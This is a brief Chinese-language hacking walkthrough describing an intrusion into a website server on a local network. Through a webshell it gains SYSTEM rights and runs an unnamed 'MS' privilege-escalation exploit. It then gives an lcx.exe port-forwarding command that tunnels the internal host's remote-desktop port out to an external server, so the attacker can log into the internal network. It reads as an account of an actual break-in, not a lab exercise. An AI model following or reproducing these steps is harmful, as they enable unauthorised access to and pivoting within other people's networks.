局域网提权实战转发科普篇

局域网提权实战转发科普篇    作者:0x80

mysql 版本有点高了，最要命的是，不支持ASP,PHP,ASPX, 脚本执行全部被禁

不能通过网页访问脚本

一般管理员不会注意，system32/cmd.exe

有权限可执行，这下还有点希望了，先来看看用户

D:\site\noso\include\taglib\> whoami
nt authority\system

系统权限，看下IP
其实系统权限可以直接提权

局域网， 这下肯定需要转发了

先上个MS看看

溢出成功了

简单是秒杀了，这时候我这边也是内网，不能转发，我需要借助

一台服务器，这时候需要在那上面去转发

首先还是监听51，33891

接着，菜刀下执行这段代码

D:\site\noso\lcx.exe -slave 外网服务器IP 51 10.2.10.90 3389

外网服务器连接 127.0.0.1：33891  ，输入提权后的帐号

成功提权进入内网。

再注销内网，看看LCX的连接情况，很顺利，没有防火墙拦截